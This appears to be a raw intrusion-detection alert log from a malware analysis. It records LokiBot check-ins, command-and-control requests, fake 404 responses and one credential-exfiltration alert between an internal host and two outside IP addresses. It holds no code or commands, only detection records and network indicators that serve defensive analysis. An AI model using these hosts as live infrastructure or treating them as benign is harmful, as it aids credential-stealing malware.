192.168.2.3188.114.97.349883802021641 08/11/22-06:43:53.308240	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49883	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349756802025381 08/11/22-06:42:28.447484	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349800802024313 08/11/22-06:43:08.046752	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349766802024313 08/11/22-06:42:42.773950	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349879802825766 08/11/22-06:43:48.403290	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49879	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349875802825766 08/11/22-06:43:47.334573	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49875	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349746802025381 08/11/22-06:42:17.452589	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349778802021641 08/11/22-06:42:46.945645	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349897802025381 08/11/22-06:44:08.828123	TCP	2025381	ET TROJAN LokiBot Checkin	49897	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349832802025381 08/11/22-06:43:19.747801	TCP	2025381	ET TROJAN LokiBot Checkin	49832	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349882802024318 08/11/22-06:43:51.663595	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49882	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349759802025381 08/11/22-06:42:31.695874	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349882802024313 08/11/22-06:43:51.663595	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49882	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349755802825766 08/11/22-06:42:27.395952	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49755	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349782802025381 08/11/22-06:42:50.570997	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349800802024318 08/11/22-06:43:08.046752	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49800	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349777802021641 08/11/22-06:42:45.276948	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349895802025381 08/11/22-06:44:06.157277	TCP	2025381	ET TROJAN LokiBot Checkin	49895	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349791802825766 08/11/22-06:42:58.117986	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49791	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349763802024313 08/11/22-06:42:39.324991	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349798802024318 08/11/22-06:43:06.576803	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349763802024318 08/11/22-06:42:39.324991	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349792802025381 08/11/22-06:42:59.404301	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349859802025381 08/11/22-06:43:42.759258	TCP	2025381	ET TROJAN LokiBot Checkin	49859	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349881802021641 08/11/22-06:43:50.015660	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49881	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349840802021641 08/11/22-06:43:28.505356	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49840	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349774802024313 08/11/22-06:42:44.099150	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349766802025381 08/11/22-06:42:42.773950	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349757802025381 08/11/22-06:42:29.610436	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349774802024318 08/11/22-06:42:44.099150	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349875802021641 08/11/22-06:43:47.334573	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49875	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349887802825766 08/11/22-06:43:58.405291	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49887	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349811802024313 08/11/22-06:43:10.662100	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49811	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349764802025381 08/11/22-06:42:41.209817	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349789802024313 08/11/22-06:42:55.412963	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349792802825766 08/11/22-06:42:59.404301	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49792	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349755802025381 08/11/22-06:42:27.395952	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349762802021641 08/11/22-06:42:35.961537	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349892802825766 08/11/22-06:44:04.916628	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49892	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349798802024313 08/11/22-06:43:06.576803	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349888802021641 08/11/22-06:44:00.133246	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49888	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349760802021641 08/11/22-06:42:32.923604	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349742802825766 08/11/22-06:42:12.661275	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349832802021641 08/11/22-06:43:19.747801	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349897802021641 08/11/22-06:44:08.828123	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49897	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349744802024313 08/11/22-06:42:15.052087	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349743802021641 08/11/22-06:42:14.045456	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349889802825766 08/11/22-06:44:01.764745	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49889	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349796802021641 08/11/22-06:43:04.193279	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349838802021641 08/11/22-06:43:24.421881	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49838	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349830802024318 08/11/22-06:43:16.837786	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49830	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349853802024313 08/11/22-06:43:40.660156	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49853	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349898802825766 08/11/22-06:44:09.907279	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49898	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349850802021641 08/11/22-06:43:33.879385	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49850	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349859802024313 08/11/22-06:43:42.759258	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49859	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349788802024318 08/11/22-06:42:54.331478	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349790802021641 08/11/22-06:42:56.651534	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349832802825766 08/11/22-06:43:19.747801	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49832	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349859802024318 08/11/22-06:43:42.759258	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49859	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349830802024313 08/11/22-06:43:16.837786	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49830	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349743802825766 08/11/22-06:42:14.045456	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349785802025381 08/11/22-06:42:51.879415	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349758802021641 08/11/22-06:42:30.656105	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.3	188.114.97.3
188.114.97.3192.168.2.380497972025483 08/11/22-06:43:05.476572	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49797	188.114.97.3	192.168.2.3
192.168.2.3188.114.97.349750802025381 08/11/22-06:42:21.832277	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349764802825766 08/11/22-06:42:41.209817	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49764	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349888802825766 08/11/22-06:44:00.133246	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49888	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349850802825766 08/11/22-06:43:33.879385	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49850	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349890802024313 08/11/22-06:44:03.457387	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49890	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349761802825766 08/11/22-06:42:34.002289	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49761	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349892802025381 08/11/22-06:44:04.916628	TCP	2025381	ET TROJAN LokiBot Checkin	49892	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349789802024318 08/11/22-06:42:55.412963	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349887802021641 08/11/22-06:43:58.405291	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49887	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349889802021641 08/11/22-06:44:01.764745	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49889	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349759802021641 08/11/22-06:42:31.695874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349838802825766 08/11/22-06:43:24.421881	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49838	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349890802024318 08/11/22-06:44:03.457387	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49890	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349748802024313 08/11/22-06:42:19.613257	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349745802024313 08/11/22-06:42:16.160936	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349742802024317 08/11/22-06:42:12.661275	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49742	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349823802025381 08/11/22-06:43:13.321407	TCP	2025381	ET TROJAN LokiBot Checkin	49823	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349895802021641 08/11/22-06:44:06.157277	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49895	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349896802025381 08/11/22-06:44:07.789189	TCP	2025381	ET TROJAN LokiBot Checkin	49896	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349754802024313 08/11/22-06:42:26.308314	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349843802024313 08/11/22-06:43:31.924022	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49843	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349748802024318 08/11/22-06:42:19.613257	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349792802021641 08/11/22-06:42:59.404301	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349887802024318 08/11/22-06:43:58.405291	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49887	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349884802021641 08/11/22-06:43:54.330408	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49884	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349885802025381 08/11/22-06:43:55.376397	TCP	2025381	ET TROJAN LokiBot Checkin	49885	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349760802825766 08/11/22-06:42:32.923604	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49760	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349774802825766 08/11/22-06:42:44.099150	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49774	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349800802021641 08/11/22-06:43:08.046752	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349879802025381 08/11/22-06:43:48.403290	TCP	2025381	ET TROJAN LokiBot Checkin	49879	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349817802025381 08/11/22-06:43:11.901228	TCP	2025381	ET TROJAN LokiBot Checkin	49817	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349780802825766 08/11/22-06:42:49.154690	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49780	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349759802825766 08/11/22-06:42:31.695874	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49759	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349761802021641 08/11/22-06:42:34.002289	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349788802024313 08/11/22-06:42:54.331478	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349747802025381 08/11/22-06:42:18.537201	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349791802024313 08/11/22-06:42:58.117986	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349882802021641 08/11/22-06:43:51.663595	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49882	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349897802825766 08/11/22-06:44:08.828123	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49897	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349800802825766 08/11/22-06:43:08.046752	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49800	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349853802024318 08/11/22-06:43:40.660156	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49853	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349793802021641 08/11/22-06:43:00.645450	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349744802024318 08/11/22-06:42:15.052087	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349791802024318 08/11/22-06:42:58.117986	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349794802025381 08/11/22-06:43:01.964847	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349881802024318 08/11/22-06:43:50.015660	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49881	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349793802825766 08/11/22-06:43:00.645450	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49793	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349828802024313 08/11/22-06:43:14.503252	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49828	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349882802825766 08/11/22-06:43:51.663595	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49882	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349881802024313 08/11/22-06:43:50.015660	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49881	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349883802025381 08/11/22-06:43:53.308240	TCP	2025381	ET TROJAN LokiBot Checkin	49883	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349746802825766 08/11/22-06:42:17.452589	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49746	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349780802021641 08/11/22-06:42:49.154690	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349751802024318 08/11/22-06:42:22.964431	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349753802025381 08/11/22-06:42:25.207102	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349828802024318 08/11/22-06:43:14.503252	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49828	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349840802024318 08/11/22-06:43:28.505356	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49840	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349745802024318 08/11/22-06:42:16.160936	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349751802024313 08/11/22-06:42:22.964431	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349786802024318 08/11/22-06:42:53.219319	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349840802024313 08/11/22-06:43:28.505356	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49840	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349875802024318 08/11/22-06:43:47.334573	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49875	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349898802021641 08/11/22-06:44:09.907279	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49898	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349774802021641 08/11/22-06:42:44.099150	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349879802024313 08/11/22-06:43:48.403290	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49879	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349763802025381 08/11/22-06:42:39.324991	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349875802024313 08/11/22-06:43:47.334573	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49875	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349811802021641 08/11/22-06:43:10.662100	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49811	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349780802024313 08/11/22-06:42:49.154690	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349879802024318 08/11/22-06:43:48.403290	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49879	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349752802025381 08/11/22-06:42:24.044623	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349789802021641 08/11/22-06:42:55.412963	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349780802024318 08/11/22-06:42:49.154690	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349762802024313 08/11/22-06:42:35.961537	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349762802024318 08/11/22-06:42:35.961537	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349777802825766 08/11/22-06:42:45.276948	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49777	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349745802025381 08/11/22-06:42:16.160936	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349843802025381 08/11/22-06:43:31.924022	TCP	2025381	ET TROJAN LokiBot Checkin	49843	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349749802825766 08/11/22-06:42:20.745320	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49749	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349832802024313 08/11/22-06:43:19.747801	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49832	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349745802825766 08/11/22-06:42:16.160936	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349897802024313 08/11/22-06:44:08.828123	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49897	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349749802025381 08/11/22-06:42:20.745320	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349778802025381 08/11/22-06:42:46.945645	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349843802825766 08/11/22-06:43:31.924022	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49843	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349746802021641 08/11/22-06:42:17.452589	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349752802825766 08/11/22-06:42:24.044623	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49752	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349756802024313 08/11/22-06:42:28.447484	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.3	188.114.96.3
188.114.96.3192.168.2.380497882025483 08/11/22-06:42:54.430865	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49788	188.114.96.3	192.168.2.3
192.168.2.3188.114.97.349800802025381 08/11/22-06:43:08.046752	TCP	2025381	ET TROJAN LokiBot Checkin	49800	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349850802024318 08/11/22-06:43:33.879385	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49850	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349790802024313 08/11/22-06:42:56.651534	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349850802024313 08/11/22-06:43:33.879385	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49850	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349777802025381 08/11/22-06:42:45.276948	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349796802025381 08/11/22-06:43:04.193279	TCP	2025381	ET TROJAN LokiBot Checkin	49796	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349867802024318 08/11/22-06:43:45.824252	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49867	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349790802024318 08/11/22-06:42:56.651534	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349859802021641 08/11/22-06:43:42.759258	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49859	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349896802825766 08/11/22-06:44:07.789189	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49896	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349832802024318 08/11/22-06:43:19.747801	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49832	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349795802024318 08/11/22-06:43:03.020333	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349890802021641 08/11/22-06:44:03.457387	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49890	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349760802025381 08/11/22-06:42:32.923604	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349795802024313 08/11/22-06:43:03.020333	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349887802024313 08/11/22-06:43:58.405291	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49887	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349759802024318 08/11/22-06:42:31.695874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349754802024318 08/11/22-06:42:26.308314	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349778802825766 08/11/22-06:42:46.945645	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49778	80	192.168.2.3	188.114.97.3
